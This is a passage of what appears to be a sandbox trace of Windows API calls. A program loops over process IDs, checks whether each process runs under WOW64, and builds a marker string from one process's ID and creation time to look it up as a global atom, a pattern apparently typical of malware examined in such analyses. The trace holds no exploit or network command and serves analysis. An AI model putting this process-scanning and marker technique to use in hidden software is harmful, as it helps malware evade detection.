	[0100.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x478
	[0100.962] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.962] CloseHandle (hObject=0x478) returned 1
	[0100.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x478
	[0100.962] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.962] CloseHandle (hObject=0x478) returned 1
	[0100.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x478
	[0100.963] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.963] CloseHandle (hObject=0x478) returned 1
	[0100.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x478
	[0100.963] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.963] CloseHandle (hObject=0x478) returned 1
	[0100.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x478
	[0100.963] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.963] CloseHandle (hObject=0x478) returned 1
	[0100.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x478
	[0100.963] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.963] CloseHandle (hObject=0x478) returned 1
	[0100.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x478
	[0100.963] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.964] CloseHandle (hObject=0x478) returned 1
	[0100.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x478
	[0100.964] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.964] CloseHandle (hObject=0x478) returned 1
	[0100.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x478
	[0100.964] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.964] CloseHandle (hObject=0x478) returned 1
	[0100.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x478
	[0100.964] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.964] CloseHandle (hObject=0x478) returned 1
	[0100.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x478
	[0100.964] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.964] CloseHandle (hObject=0x478) returned 1
	[0100.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x478
	[0100.965] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.965] CloseHandle (hObject=0x478) returned 1
	[0100.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x478
	[0100.965] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.965] CloseHandle (hObject=0x478) returned 1
	[0100.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x478
	[0100.965] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.965] CloseHandle (hObject=0x478) returned 1
	[0100.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x478
	[0100.965] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.965] CloseHandle (hObject=0x478) returned 1
	[0100.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x478
	[0100.965] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.965] CloseHandle (hObject=0x478) returned 1
	[0100.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x478
	[0100.966] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.966] CloseHandle (hObject=0x478) returned 1
	[0100.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x478
	[0100.966] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.966] CloseHandle (hObject=0x478) returned 1
	[0100.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x478
	[0100.966] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.966] CloseHandle (hObject=0x478) returned 1
	[0100.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x478
	[0100.966] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.966] CloseHandle (hObject=0x478) returned 1
	[0100.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x478
	[0100.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.967] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0100.967] GetProcessTimes (in: hProcess=0x478, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0100.967] wsprintfA (in: param_1=0x68f2d0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0100.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.968] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0100.968] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0100.968] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0100.968] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0100.968] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0100.968] CloseHandle (hObject=0x478) returned 1
	[0100.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0100.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x478
	[0100.968] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.978] CloseHandle (hObject=0x478) returned 1
	[0100.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x478
	[0100.979] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0100.979] CloseHandle (hObject=0x478) returned 1
	[0101.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x478
	[0101.024] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.024] CloseHandle (hObject=0x478) returned 1
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x478
	[0101.024] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.024] CloseHandle (hObject=0x478) returned 1
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x478
	[0101.025] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.025] CloseHandle (hObject=0x478) returned 1
	[0101.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x478
	[0101.025] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.025] CloseHandle (hObject=0x478) returned 1
	[0101.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x478
	[0101.025] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.025] CloseHandle (hObject=0x478) returned 1
	[0101.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x478
	[0101.025] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.025] CloseHandle (hObject=0x478) returned 1
	[0101.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x478
	[0101.026] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.026] CloseHandle (hObject=0x478) returned 1
	[0101.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x478
	[0101.026] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.026] CloseHandle (hObject=0x478) returned 1
	[0101.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x478
	[0101.026] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.026] CloseHandle (hObject=0x478) returned 1
	[0101.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x478
	[0101.026] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.026] CloseHandle (hObject=0x478) returned 1
	[0101.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x478
	[0101.026] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.027] CloseHandle (hObject=0x478) returned 1
	[0101.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x478
	[0101.027] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.027] CloseHandle (hObject=0x478) returned 1
	[0101.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x478
	[0101.027] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.027] CloseHandle (hObject=0x478) returned 1
	[0101.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x478
	[0101.027] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.027] CloseHandle (hObject=0x478) returned 1
	[0101.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x478
	[0101.027] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.027] CloseHandle (hObject=0x478) returned 1
	[0101.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x478
	[0101.028] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.028] CloseHandle (hObject=0x478) returned 1
	[0101.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x478
	[0101.028] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.028] CloseHandle (hObject=0x478) returned 1
	[0101.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x478
	[0101.028] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.028] CloseHandle (hObject=0x478) returned 1
	[0101.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x478
	[0101.028] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.029] CloseHandle (hObject=0x478) returned 1
	[0101.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x478
	[0101.029] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.029] CloseHandle (hObject=0x478) returned 1
	[0101.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x478
	[0101.029] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.029] CloseHandle (hObject=0x478) returned 1
	[0101.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x478
	[0101.029] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.029] CloseHandle (hObject=0x478) returned 1
	[0101.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x478
	[0101.029] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.029] CloseHandle (hObject=0x478) returned 1
	[0101.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x478
	[0101.030] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.030] CloseHandle (hObject=0x478) returned 1
	[0101.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x478
	[0101.030] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.030] CloseHandle (hObject=0x478) returned 1
	[0101.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x478
	[0101.030] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.030] CloseHandle (hObject=0x478) returned 1
	[0101.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x478
	[0101.030] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.030] CloseHandle (hObject=0x478) returned 1
	[0101.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x478
	[0101.030] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.030] CloseHandle (hObject=0x478) returned 1
	[0101.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x478
	[0101.031] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.031] CloseHandle (hObject=0x478) returned 1
	[0101.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x478
	[0101.031] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.031] CloseHandle (hObject=0x478) returned 1
	[0101.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x478
	[0101.031] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.031] CloseHandle (hObject=0x478) returned 1
	[0101.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x478
	[0101.032] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.032] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.032] GetProcessTimes (in: hProcess=0x478, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.038] wsprintfA (in: param_1=0x68f2d0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.038] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.038] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.038] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.039] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.039] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.039] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.039] CloseHandle (hObject=0x478) returned 1
	[0101.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x478
	[0101.039] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.039] CloseHandle (hObject=0x478) returned 1
	[0101.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x478
	[0101.039] IsWow64Process (in: hProcess=0x478, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.039] CloseHandle (hObject=0x478) returned 1
	[0101.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x47c
	[0101.278] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.278] CloseHandle (hObject=0x47c) returned 1
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x47c
	[0101.278] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.278] CloseHandle (hObject=0x47c) returned 1
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x47c
	[0101.278] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.279] CloseHandle (hObject=0x47c) returned 1
	[0101.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x47c
	[0101.279] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.279] CloseHandle (hObject=0x47c) returned 1
	[0101.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x47c
	[0101.279] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.279] CloseHandle (hObject=0x47c) returned 1
	[0101.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x47c
	[0101.279] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.279] CloseHandle (hObject=0x47c) returned 1
	[0101.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x47c
	[0101.279] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.279] CloseHandle (hObject=0x47c) returned 1
	[0101.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x47c
	[0101.280] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.280] CloseHandle (hObject=0x47c) returned 1
	[0101.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x47c
	[0101.280] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.280] CloseHandle (hObject=0x47c) returned 1
	[0101.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x47c
	[0101.280] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.280] CloseHandle (hObject=0x47c) returned 1
	[0101.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x47c
	[0101.280] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.280] CloseHandle (hObject=0x47c) returned 1
	[0101.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x47c
	[0101.280] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.280] CloseHandle (hObject=0x47c) returned 1
	[0101.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x47c
	[0101.281] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.281] CloseHandle (hObject=0x47c) returned 1
	[0101.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x47c
	[0101.281] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.281] CloseHandle (hObject=0x47c) returned 1
	[0101.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x47c
	[0101.281] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.281] CloseHandle (hObject=0x47c) returned 1
	[0101.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x47c
	[0101.281] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.281] CloseHandle (hObject=0x47c) returned 1
	[0101.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x47c
	[0101.282] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.282] CloseHandle (hObject=0x47c) returned 1
	[0101.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x47c
	[0101.282] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.282] CloseHandle (hObject=0x47c) returned 1
	[0101.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x47c
	[0101.285] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.285] CloseHandle (hObject=0x47c) returned 1
	[0101.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x47c
	[0101.285] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.285] CloseHandle (hObject=0x47c) returned 1
